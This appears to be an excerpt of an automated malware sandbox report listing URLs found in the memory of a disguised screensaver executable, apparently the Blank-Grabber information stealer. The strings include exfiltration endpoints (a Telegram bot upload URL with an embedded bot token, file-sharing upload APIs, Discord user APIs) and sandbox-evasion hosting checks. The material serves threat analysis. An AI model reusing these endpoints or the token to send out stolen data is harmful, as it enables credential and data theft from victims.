#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058859653.0000028C8766F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2127743261.0000028C87B27000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328659211.0000028C87B27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C8768F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C87690000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86D0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000029.00000002.2158201728.000001530176B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042073233.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033391617.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033733200.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042177471.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034348641.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033839925.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034111679.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2034224665.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033990521.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033195251.000001CCD86C3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040865247.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2033558347.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftILEEX~1.LNKy./
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftISPLA~1.PNGy.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftRUSTT~2JSOy./
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88234000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329477529.0000028C87C6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060606390.0000028C87391000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2059021822.0000028C87D20000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058548042.0000028C87CE6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2058318262.0000028C87E4B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C8724C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060852882.0000028C877E6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2061237289.0000028C87680000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
